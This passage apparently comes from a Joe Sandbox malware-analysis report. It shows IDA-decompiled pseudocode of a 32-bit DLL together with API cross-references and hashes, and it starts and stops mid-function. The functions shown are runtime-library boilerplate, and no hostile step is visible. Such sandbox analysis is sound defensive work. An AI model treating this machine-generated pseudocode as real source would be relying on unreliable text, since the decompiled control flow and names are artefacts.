              										_t282 = _v32;
              										_t261 = _t228[4];
              										_v44 = _t261;
              										_push(_t266);
              										__eflags = 0x7fffffff - _t261 - _t282;
              										if(__eflags < 0) {
              											E6DA814C0(_t228, 0x7fffffff, _t261, __eflags);
              											goto L39;
              										} else {
              											_t266 = _t228[5];
              											_t196 = _t261 + _t282;
              											_v16 = _t196;
              											_t300 = _t196 | 0x0000000f;
              											_v0 = _t266;
              											__eflags = _t300 - 0x7fffffff;
              											if(__eflags <= 0) {
              												_t198 = _t266 >> 1;
              												_t242 = 0x7fffffff - _t198;
              												__eflags = _t266 - _t242;
              												if(__eflags <= 0) {
              													_t199 = _t198 + _t266;
              													__eflags = _t300 - _t199;
              													_t282 =  <  ? _t199 : _t300;
              													_t35 = _t282 + 1; // 0x80000000
              													_t242 = _t35;
              													__eflags = _t242 - 0x1000;
              													if(_t242 < 0x1000) {
              														__eflags = _t242;
              														if(__eflags == 0) {
              															_t266 = 0;
              															__eflags = 0;
              														} else {
              															_t213 = E6DA89399(_t266, _t282, __eflags, _t242);
              															_t261 = _v12;
              															_t321 = _t321 + 4;
              															_t266 = _t213;
              														}
              														goto L32;
              													} else {
              														_t36 =  &(_t242[8]); // 0x80000023
              														_t214 = _t36;
              														__eflags = _t36 - _t242;
              														if(__eflags <= 0) {
              															L39:
              															E6DA81420();
              															goto L40;
              														} else {
              															goto L22;
              														}
              													}
              												} else {
              													_t282 = 0x7fffffff;
              													goto L21;
              												}
              											} else {
              												_t282 = 0x7fffffff;
              												L21:
              												_t214 = 0x80000023;
              												L22:
              												_t215 = E6DA89399(_t266, _t282, __eflags, _t214);
              												_t321 = _t321 + 4;
              												__eflags = _t215;
              												if(_t215 == 0) {
              													L40:
              													E6DA8DACF(_t228, _t242, _t261);
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													asm("int3");
              													_push(_t308);
              													_t309 = _t321;
              													_t322 = _t321 - 0xc;
              													_t262 = _v48;
              													_push(_t228);
              													_t229 = _t242;
              													_t243 = 0x7fffffff;
              													_push(_t282);
              													_push(_t266);
              													_t283 = _t229[4];
              													_v60 = _t283;
              													__eflags = 0x7fffffff - _t283 - _t262;
              													if(__eflags < 0) {
              														E6DA814C0(_t229, 0x7fffffff, _t262, __eflags);
              														goto L62;
              													} else {
              														_t266 = _t229[5];
              														_t172 = _t283 + _t262;
              														_v20 = _t172;
              														_t294 = _t172 | 0x0000000f;
              														_v4 = _t266;
              														__eflags = _t294 - 0x7fffffff;
              														if(__eflags <= 0) {
              															_t174 = _t266 >> 1;
              															_t243 = 0x7fffffff - _t174;
              															__eflags = _t266 - _t243;
              															if(__eflags <= 0) {
              																_t175 = _t174 + _t266;
              																__eflags = _t294 - _t175;
              																_t283 =  <  ? _t175 : _t294;
              																_t65 = _t283 + 1; // 0x80000000
              																_t243 = _t65;
              																__eflags = _t243 - 0x1000;
              																if(_t243 < 0x1000) {
              																	__eflags = _t243;
              																	if(__eflags == 0) {
              																		_t266 = 0;
              																		__eflags = 0;
              																	} else {
              																		_t193 = E6DA89399(_t266, _t283, __eflags, _t243);
              																		_t322 = _t322 + 4;
              																		_t266 = _t193;
              																	}
              																	goto L55;
              																} else {
              																	_t66 = _t243 + 0x23; // 0x80000023
              																	_t194 = _t66;
              																	__eflags = _t66 - _t243;
              																	if(__eflags <= 0) {
              																		L62:
              																		E6DA81420();
              																		goto L63;
              																	} else {
              																		goto L45;
              																	}
              																}
              															} else {
              																_t283 = 0x7fffffff;
              																goto L44;
              															}
              														} else {
              															_t283 = 0x7fffffff;
              															L44:
              															_t194 = 0x80000023;
              															L45:
              															_t195 = E6DA89399(_t266, _t283, __eflags, _t194);
              															_t322 = _t322 + 4;
              															__eflags = _t195;
              															if(_t195 == 0) {
              																L63:
              																E6DA8DACF(_t229, _t243, _t262);
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																asm("int3");
              																_push(_t309);
              																_t323 = _t322 - 8;
              																_push(_t229);
              																_t230 = _t243;
              																_t244 = 0x7fffffff;
              																_push(_t283);
              																_t284 = _v68;
              																_t263 = _t230[4];
              																_v80 = _t263;
              																_push(_t266);
              																__eflags = 0x7fffffff - _t263 - _t284;
              																if(__eflags < 0) {
              																	E6DA814C0(_t230, 0x7fffffff, _t263, __eflags);
              																	goto L85;
              																} else {
              																	_t268 = _t230[5];
              																	_t151 = _t263 + _t284;
              																	_v24 = _t151;
              																	_t286 = _t151 | 0x0000000f;
              																	_v8 = _t268;
              																	__eflags = _t286 - 0x7fffffff;
              																	if(__eflags <= 0) {
              																		_t153 = _t268 >> 1;
              																		_t244 = 0x7fffffff - _t153;
              																		__eflags = _t268 - _t244;
              																		if(__eflags <= 0) {
              																			_t154 = _t153 + _t268;
              																			__eflags = _t286 - _t154;
              																			_t287 =  <  ? _t154 : _t286;
              																			_t104 = _t287 + 1; // 0x80000000
              																			_t244 = _t104;
              																			__eflags = _t244 - 0x1000;
              																			if(_t244 < 0x1000) {
              																				__eflags = _t244;
              																				if(__eflags == 0) {
              																					_t269 = 0;
              																					__eflags = 0;
              																				} else {
              																					_t169 = E6DA89399(_t268, _t287, __eflags, _t244);
              																					_t263 = _v20;
              																					_t323 = _t323 + 4;
              																					_t269 = _t169;
              																				}
              																				goto L78;
              																			} else {
              																				_t105 = _t244 + 0x23; // 0x80000023
              																				_t170 = _t105;
              																				__eflags = _t105 - _t244;
              																				if(__eflags <= 0) {
              																					L85:
              																					E6DA81420();
              																					goto L86;
              																				} else {
              																					goto L68;
              																				}
              																			}
              																		} else {
              																			_t287 = 0x7fffffff;
              																			goto L67;
              																		}
              																	} else {
              																		_t287 = 0x7fffffff;
              																		L67:
              																		_t170 = 0x80000023;
              																		L68:
              																		_t171 = E6DA89399(_t268, _t287, __eflags, _t170);
              																		_t323 = _t323 + 4;
              																		__eflags = _t171;
              																		if(_t171 == 0) {
              																			L86:
              																			_t148 = E6DA8DACF(_t230, _t244, _t263);
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			asm("int3");
              																			_t245 =  *_t244;
              																			__eflags = _t245;
              																			if(_t245 != 0) {
              																				return  *( *_t245)(1);
              																			}
              																			return _t148;
              																		} else {
              																			_t263 = _v20;
              																			_t102 =  &(_t171[8]); // 0x23
              																			_t269 = _t102 & 0xffffffe0;
              																			 *(_t269 - 4) = _t171;
              																			L78:
              																			_t230[4] = _v24;
              																			_t230[5] = _t287;
              																			_t288 = _t269 + _t263;
              																			_v24 = _t288;
              																			__eflags = _v8 - 0x10;
              																			_v20 = _v0 + _t288;
              																			_push(_t263);
              																			if(_v8 < 0x10) {
              																				_push(_t230);
              																				_push(_t269);
              																				E6DA8AB10();
              																				E6DA8B0A0(_t269, _t288, _a4, _v0);
              																				 *_v20 = 0;
              																				 *_t230 = _t269;
              																				return _t230;
              																			} else {
              																				_t290 =  *_t230;
              																				_push(_t290);
              																				_push(_t269);
              																				E6DA8AB10();
              																				E6DA8B0A0(_t269, _v24, _a4, _v0);
              																				_t247 = _v8 + 1;
              																				 *_v20 = 0;
              																				__eflags = _t247 - 0x1000;
              																				if(_t247 < 0x1000) {
              																					L82:
              																					_push(_t247);
              																					E6DA893C9(_t290);
              																					 *_t230 = _t269;
              																					return _t230;
              																				} else {
              																					_t263 =  *(_t290 - 4);
              																					_t244 = _t247 + 0x23;
              																					_t123 = _t290 - _t263 - 4; // 0x7ffffffb
              																					__eflags = _t123 - 0x1f;
              																					if(_t123 > 0x1f) {
              																						goto L86;
              																					} else {
              																						_t290 = _t263;
              																						goto L82;
              																					}
              																				}
              																			}
              																		}
              																	}
              																}
              															} else {
              																_t63 =  &(_t195[8]); // 0x23
              																_t266 = _t63 & 0xffffffe0;
              																 *(_t266 - 4) = _t195;
              																L55:
              																_t229[4] = _v20;
              																_t178 = _a4;
              																_t229[5] = _t283;
              																_v16 = _v16 - _t178 + 1;
              																_t295 = _t266 + _t178;
              																_v24 = _t295;
              																__eflags = _v4 - 0x10;
              																_v20 = _a8 + _t295;
              																_push(_t178);
              																if(_v4 < 0x10) {
              																	_push(_t229);
              																	_push(_t266);
              																	E6DA8AB10();
              																	E6DA8B0A0(_t266, _t295, _a12, _a8);
              																	__eflags = _t229 + _a4;
              																	E6DA8AB10(_v20, _t229 + _a4, _v16);
              																	 *_t229 = _t266;
              																	return _t229;
              																} else {
              																	_t297 =  *_t229;
              																	_push(_t297);
              																	_push(_t266);
              																	E6DA8AB10();
              																	E6DA8B0A0(_t266, _v24, _a12, _a8);
              																	E6DA8AB10(_v20, _a4 + _t297, _v16);
              																	_t322 = _t322 + 0x24;
              																	_t254 = _v4 + 1;
              																	__eflags = _t254 - 0x1000;
              																	if(_t254 < 0x1000) {
              																		L59:
              																		_push(_t254);
              																		E6DA893C9(_t297);
              																		 *_t229 = _t266;
              																		return _t229;
              																	} else {
              																		_t262 =  *(_t297 - 4);
              																		_t243 = _t254 + 0x23;
              																		_t283 = _t297 - _t262;
              																		_t88 = _t283 - 4; // 0x7ffffffb
              																		__eflags = _t88 - 0x1f;
              																		if(_t88 > 0x1f) {
              																			goto L63;
              																		} else {
              																			_t297 = _t262;
              																			goto L59;
              																		}
              																	}
              																}
              															}
              														}
              													}
              												} else {
              													_t261 = _v12;
              													_t33 =  &(_t215[8]); // 0x23
              													_t266 = _t33 & 0xffffffe0;
              													 *(_t266 - 4) = _t215;
              													L32:
              													_t228[4] = _v16;
              													_t228[5] = _t282;
              													_t301 = _t266 + _t261;
              													_v16 = _t301;
              													__eflags = _v0 - 0x10;
              													_v12 = _a12 + _t301;
              													_push(_t261);
              													if(_v0 < 0x10) {
              														_push(_t228);
              														_push(_t266);
              														E6DA8AB10();
              														E6DA8AB10(_t301, _a8, _a12);
              														 *_v12 = 0;
              														 *_t228 = _t266;
              														return _t228;
              													} else {
              														_t303 =  *_t228;
              														_push(_t303);
              														_push(_t266);
              														E6DA8AB10();
              														E6DA8AB10(_v16, _a8, _a12);
              														_t321 = _t321 + 0x18;
              														_t256 = _v0 + 1;
              														 *_v12 = 0;
              														__eflags = _t256 - 0x1000;
              														if(_t256 < 0x1000) {
              															L36:
              															_push(_t256);
              															E6DA893C9(_t303);
              															 *_t228 = _t266;
              															return _t228;
              														} else {
              															_t261 =  *(_t303 - 4);
              															_t242 = _t256 + 0x23;
              															_t282 = _t303 - _t261;
              															_t52 = _t282 - 4; // 0x7ffffffb
              															__eflags = _t52 - 0x1f;
              															if(_t52 > 0x1f) {
              																goto L40;
              															} else {
              																_t303 = _t261;
              																goto L36;
              															}
              														}
              													}
              												}
              											}
              										}
              									} else {
              										_t280 = _v20;
              										_a4 = _t280;
              										_v8 = 1;
              										E6DA88A87(__eflags, _t280);
              										 *((intOrPtr*)( *_t280 + 4))();
              										 *0x6dad5c78 = _t280;
              										goto L16;
              									}
              								} else {
              									_t280 = _t226;
              									goto L16;
              								}
              							} else {
              								_t280 =  *( *((intOrPtr*)(_t218 + 8)) + _t266 * 4);
              								goto L11;
              							}
              						}
              					}
              				}
              			}

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85DB3
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85DD6
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85DF6
              • std::_Facet_Register.LIBCPMT ref: 6DA85E5B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85E73
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA85E8B
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
              • String ID:
              • API String ID: 2081738530-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E6DA8C471(void* __ecx) {
              				void* _t4;
              				void* _t8;
              				void* _t11;
              				void* _t13;
              				void* _t14;
              				void* _t18;
              				void* _t23;
              				long _t24;
              				void* _t27;
              
              				_t13 = __ecx;
              				if( *0x6dab3030 != 0xffffffff) {
              					_t24 = GetLastError();
              					_t11 = E6DA8D66B(_t13, __eflags,  *0x6dab3030);
              					_t14 = _t23;
              					__eflags = _t11 - 0xffffffff;
              					if(_t11 == 0xffffffff) {
              						L5:
              						_t11 = 0;
              					} else {
              						__eflags = _t11;
              						if(__eflags == 0) {
              							_t4 = E6DA8D6A6(_t14, __eflags,  *0x6dab3030, 0xffffffff);
              							__eflags = _t4;
              							if(_t4 != 0) {
              								_push(0x28);
              								_t27 = E6DA8DD0F();
              								_t18 = 1;
              								__eflags = _t27;
              								if(__eflags == 0) {
              									L8:
              									_t11 = 0;
              									E6DA8D6A6(_t18, __eflags,  *0x6dab3030, 0);
              								} else {
              									_t8 = E6DA8D6A6(_t18, __eflags,  *0x6dab3030, _t27);
              									_pop(_t18);
              									__eflags = _t8;
              									if(__eflags != 0) {
              										_t11 = _t27;
              										_t27 = 0;
              										__eflags = 0;
              									} else {
              										goto L8;
              									}
              								}
              								E6DA8DCF4(_t27);
              							} else {
              								goto L5;
              							}
              						}
              					}
              					SetLastError(_t24);
              					return _t11;
              				} else {
              					return 0;
              				}
              			}

              APIs
              • GetLastError.KERNEL32(00000001,?,6DA8C382,6DA895C8,6DA89859,?,6DA89A91,?,00000001,?,?,00000001,?,6DAB10F8,0000000C,6DA89B8A), ref: 6DA8C47F
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DA8C48D
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DA8C4A6
              • SetLastError.KERNEL32(00000000,6DA89A91,?,00000001,?,?,00000001,?,6DAB10F8,0000000C,6DA89B8A,?,00000001,?), ref: 6DA8C4F8
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA8D512(void* __ecx, signed int* _a4, intOrPtr _a8) {
              				WCHAR* _v8;
              				signed int _t11;
              				WCHAR* _t12;
              				struct HINSTANCE__* _t16;
              				struct HINSTANCE__* _t18;
              				signed int* _t22;
              				signed int* _t26;
              				struct HINSTANCE__* _t29;
              				WCHAR* _t31;
              				void* _t32;
              
              				_t26 = _a4;
              				while(_t26 != _a8) {
              					_t11 =  *_t26;
              					_t22 = 0x6dad556c + _t11 * 4;
              					_t29 =  *_t22;
              					if(_t29 == 0) {
              						_t12 =  *(0x6daa59c8 + _t11 * 4);
              						_v8 = _t12;
              						_t29 = LoadLibraryExW(_t12, 0, 0x800);
              						if(_t29 != 0) {
              							L13:
              							 *_t22 = _t29;
              							if( *_t22 != 0) {
              								FreeLibrary(_t29);
              							}
              							L15:
              							_t16 = _t29;
              							L12:
              							return _t16;
              						}
              						_t18 = GetLastError();
              						if(_t18 != 0x57) {
              							L8:
              							 *_t22 = _t18 | 0xffffffff;
              							L9:
              							_t26 =  &(_t26[1]);
              							continue;
              						}
              						_t31 = _v8;
              						_t18 = E6DA92838(_t31, L"api-ms-", 7);
              						_t32 = _t32 + 0xc;
              						if(_t18 == 0) {
              							goto L8;
              						}
              						_t18 = LoadLibraryExW(_t31, 0, 0);
              						_t29 = _t18;
              						if(_t29 != 0) {
              							goto L13;
              						}
              						goto L8;
              					}
              					if(_t29 != 0xffffffff) {
              						goto L15;
              					}
              					goto L9;
              				}
              				_t16 = 0;
              				goto L12;
              			}

              APIs
              • FreeLibrary.KERNEL32(00000000,?,?,6DA8D5D3,00000000,?,00000001,00000000,?,6DA8D64A,00000001,FlsFree,6DAA5A84,FlsFree,00000000), ref: 6DA8D5A2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-
              • API String ID: 3664257935-2084034818
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 25%
              			E6DA91632(intOrPtr _a4) {
              				char _v16;
              				signed int _v20;
              				signed int _t11;
              				int _t14;
              				void* _t16;
              				void* _t20;
              				int _t22;
              				signed int _t23;
              
              				_t11 =  *0x6dab3014; // 0x6c4e8ceb
              				 *[fs:0x0] =  &_v16;
              				_v20 = _v20 & 0x00000000;
              				_t14 =  &_v20;
              				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6DAA277B, 0xffffffff);
              				if(_t14 != 0) {
              					_t14 = GetProcAddress(_v20, "CorExitProcess");
              					_t22 = _t14;
              					if(_t22 != 0) {
              						 *0x6daa415c(_a4);
              						_t14 =  *_t22();
              					}
              				}
              				if(_v20 != 0) {
              					_t14 = FreeLibrary(_v20);
              				}
              				 *[fs:0x0] = _v16;
              				return _t14;
              			}

              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6C4E8CEB,?,?,00000000,6DAA277B,000000FF,?,6DA915C2,?,?,6DA91596,00000016), ref: 6DA91667
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6DA91679
              • FreeLibrary.KERNEL32(00000000,?,00000000,6DAA277B,000000FF,?,6DA915C2,?,?,6DA91596,00000016), ref: 6DA9169B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 60%
              			E6DA974B4(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
              				signed int _v8;
              				intOrPtr _v12;
              				void* _v24;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t41;
              				intOrPtr _t46;
              				signed int _t49;
              				void* _t52;
              				signed int _t56;
              				intOrPtr _t65;
              				intOrPtr _t70;
              				intOrPtr _t71;
              				intOrPtr _t73;
              				void* _t74;
              				intOrPtr _t75;
              				void* _t92;
              				intOrPtr* _t93;
              				void* _t95;
              				intOrPtr* _t96;
              				intOrPtr* _t98;
              				signed int _t99;
              				void* _t100;
              				intOrPtr* _t101;
              				intOrPtr* _t103;
              				void* _t106;
              
              				_push(__ecx);
              				_push(__ecx);
              				_t41 =  *0x6dab3014; // 0x6c4e8ceb
              				_v8 = _t41 ^ _t99;
              				_t73 = _a20;
              				if(_t73 > 0) {
              					_t71 = E6DA90C3D(_a16, _t73);
              					_t106 = _t71 - _t73;
              					_t4 = _t71 + 1; // 0x1
              					_t73 = _t4;
              					if(_t106 >= 0) {
              						_t73 = _t71;
              					}
              				}
              				_t77 = _a32;
              				if(_a32 == 0) {
              					_t70 =  *((intOrPtr*)( *_a4 + 8));
              					_t77 = _t70;
              					_a32 = _t70;
              				}
              				_t46 = E6DA98F05(_t77, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t73, 0, 0);
              				_t101 = _t100 + 0x18;
              				_v12 = _t46;
              				if(_t46 == 0) {
              					L41:
              					_pop(_t92);
              					_pop(_t95);
              					_pop(_t74);
              					return E6DA89B91(_t46, _t74, _v8 ^ _t99, 0x400, _t92, _t95);
              				} else {
              					_t16 = _t46 + _t46 + 8; // 0x8
              					asm("sbb eax, eax");
              					_t49 = _t46 + _t46 & _t16;
              					if(_t49 == 0) {
              						_t96 = 0;
              						L39:
              						_t75 = 0;
              						L40:
              						E6DA8937B(_t96);
              						_t46 = _t75;
              						goto L41;
              					}
              					if(_t49 > 0x400) {
              						_t93 = E6DA9458B(_t49);
              						if(_t93 == 0) {
              							L13:
              							_t96 = _t93;
              							if(_t93 == 0) {
              								goto L39;
              							}
              							_t52 = E6DA98F05(_a32, 1, _a16, _t73, _t93, _v12);
              							_t103 = _t101 + 0x18;
              							if(_t52 == 0) {
              								goto L39;
              							}
              							_t97 = _v12;
              							_t75 = E6DA9694F(_a8, _a12, _t93, _v12, 0, 0, 0, 0, 0);
              							if(_t75 == 0) {
              								L19:
              								_t96 = _t93;
              								goto L39;
              							}
              							if((_a12 & 0x00000400) == 0) {
              								_t31 = _t75 + _t75 + 8; // 0x8
              								asm("sbb eax, eax");
              								_t56 = _t75 + _t75 & _t31;
              								if(_t56 == 0) {
              									_t98 = 0;
              									L37:
              									E6DA8937B(_t98);
              									goto L19;
              								}
              								if(_t56 > 0x400) {
              									_t98 = E6DA9458B(_t56);
              									if(_t98 == 0) {
              										goto L37;
              									}
              									 *_t98 = 0xdddd;
              									L28:
              									_t98 = _t98 + 8;
              									if(_t98 == 0 || E6DA9694F(_a8, _a12, _t93, _v12, _t98, _t75, 0, 0, 0) == 0) {
              										goto L37;
              									} else {
              										_push(0);
              										_push(0);
              										if(_a28 != 0) {
              											_push(_a28);
              											_push(_a24);
              										} else {
              											_push(0);
              											_push(0);
              										}
              										_push(_t75);
              										_push(_t98);
              										_push(0);
              										_push(_a32);
              										_t75 = E6DA98F81();
              										if(_t75 == 0) {
              											goto L37;
              										} else {
              											E6DA8937B(_t98);
              											L34:
              											_t96 = _t93;
              											goto L40;
              										}
              									}
              								}
              								E6DA89C20(_t56);
              								_t98 = _t103;
              								if(_t98 == 0) {
              									goto L37;
              								}
              								 *_t98 = 0xcccc;
              								goto L28;
              							}
              							_t65 = _a28;
              							if(_t65 == 0) {
              								goto L34;
              							}
              							if(_t75 <= _t65) {
              								_t75 = E6DA9694F(_a8, _a12, _t93, _t97, _a24, _t65, 0, 0, 0);
              								if(_t75 != 0) {
              									goto L34;
              								}
              							}
              							goto L19;
              						}
              						 *_t93 = 0xdddd;
              						L12:
              						_t93 = _t93 + 8;
              						goto L13;
              					}
              					E6DA89C20(_t49);
              					_t93 = _t101;
              					if(_t93 == 0) {
              						goto L13;
              					}
              					 *_t93 = 0xcccc;
              					goto L12;
              				}
              			}

              APIs
              • __alloca_probe_16.LIBCMT ref: 6DA9753B
              • __alloca_probe_16.LIBCMT ref: 6DA975FC
              • __freea.LIBCMT ref: 6DA97663
                • Part of subcall function 6DA9458B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DA945BD
              • __freea.LIBCMT ref: 6DA97678
              • __freea.LIBCMT ref: 6DA97688
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocateHeap
              • String ID:
              • API String ID: 1423051803-0
              • Opcode ID: 21054bad0b019baf278c25f1505abf53a85cb1192e725219dcd1f11a992d80e2
              • Instruction ID: c3990e0584ed964756b8f4f5c62e4e693512c7a4c58417d5accc161b3057ffc9
              • Opcode Fuzzy Hash: 21054bad0b019baf278c25f1505abf53a85cb1192e725219dcd1f11a992d80e2
              • Instruction Fuzzy Hash: DA518376A2C2176FEF118FA88D40EBB36E9EF45654F1A4128FE14DE250E771CC9186B0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E6DA82D40(void* __ebx, void* __ecx, signed int _a4, char _a8) {
              				char _v24;
              				char _v32;
              				intOrPtr _v48;
              				signed int _t20;
              				void* _t22;
              				void* _t32;
              				signed char _t35;
              				intOrPtr* _t37;
              				char* _t40;
              				intOrPtr* _t42;
              				intOrPtr _t45;
              
              				_t32 = __ebx;
              				_t20 = _a4 & 0x00000017;
              				 *(__ecx + 0xc) = _t20;
              				_t35 =  *(__ecx + 0x10) & _t20;
              				if(_t35 == 0) {
              					return _t20;
              				} else {
              					if(_a8 != 0) {
              						E6DA8AA9D(0, 0);
              					}
              					if((_t35 & 0x00000004) == 0) {
              						_t40 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
              					} else {
              						_t40 = "ios_base::badbit set";
              					}
              					_t22 = E6DA825A0( &_v32);
              					_t37 =  &_v24;
              					E6DA82C70(_t32, _t37, _t40, _t22);
              					E6DA8AA9D( &_v32, 0x6dab17a0);
              					asm("int3");
              					_t45 = _v48;
              					asm("xorps xmm0, xmm0");
              					_t42 = _t37;
              					 *_t42 = 0x6daa4214;
              					asm("movq [eax], xmm0");
              					_t14 = _t45 + 4; // 0x4
              					E6DA8A701(_t14, _t42 + 4);
              					 *_t42 = 0x6daaf434;
              					 *((intOrPtr*)(_t42 + 0xc)) =  *((intOrPtr*)(_t45 + 0xc));
              					 *((intOrPtr*)(_t42 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10));
              					 *_t42 = 0x6daaf45c;
              					return _t42;
              				}
              			}

              APIs
              • ___std_exception_copy.LIBVCRUNTIME ref: 6DA82DCF
                • Part of subcall function 6DA8AA9D: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,6DA88868,?,6DAB0F8C,0000001D,WIPTsfDddTRsYDKObDdZHPEivdAcq,0000001D), ref: 6DA8AAFD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionRaise___std_exception_copy
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3109751735-1866435925
              • Opcode ID: 24f4e300eff45bed9b588072df1a4168bd1710bf3a5cefe4a13a60437729c60e
              • Instruction ID: 8a843641e7d284fcac228aa9e7b56d39ad65b5b1d836ee6838e44b31d5541755
              • Opcode Fuzzy Hash: 24f4e300eff45bed9b588072df1a4168bd1710bf3a5cefe4a13a60437729c60e
              • Instruction Fuzzy Hash: 561106B251C7056FC714CF68C801BA6B7E8BF41210F18C61AFD658B682EB30E8D4CB61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E6DA9FB75(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
              				char _v16;
              				signed int _v20;
              				char _v28;
              				char _v35;
              				signed char _v36;
              				void _v44;
              				long _v48;
              				signed char* _v52;
              				char _v53;
              				long _v60;
              				intOrPtr _v64;
              				struct _OVERLAPPED* _v68;
              				signed int _v72;
              				struct _OVERLAPPED* _v76;
              				signed int _v80;
              				signed int _v84;
              				intOrPtr _v88;
              				void _v92;
              				long _v96;
              				signed char* _v100;
              				void* _v104;
              				intOrPtr _v108;
              				char _v112;
              				int _v116;
              				struct _OVERLAPPED* _v120;
              				struct _OVERLAPPED* _v124;
              				struct _OVERLAPPED* _v128;
              				struct _OVERLAPPED* _v132;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t177;
              				signed int _t178;
              				signed int _t180;
              				int _t186;
              				signed char* _t190;
              				signed char _t195;
              				intOrPtr _t198;
              				void* _t200;
              				signed char* _t201;
              				long _t205;
              				intOrPtr _t210;
              				void _t212;
              				signed char* _t217;
              				void* _t224;
              				char _t227;
              				struct _OVERLAPPED* _t229;
              				void* _t238;
              				signed int _t240;
              				signed char* _t243;
              				long _t246;
              				intOrPtr _t247;
              				signed char* _t248;
              				void* _t258;
              				intOrPtr _t265;
              				void* _t266;
              				struct _OVERLAPPED* _t267;
              				signed int _t268;
              				signed int _t273;
              				intOrPtr* _t279;
              				signed int _t281;
              				signed int _t285;
              				signed char _t286;
              				long _t287;
              				signed int _t291;
              				signed char* _t292;
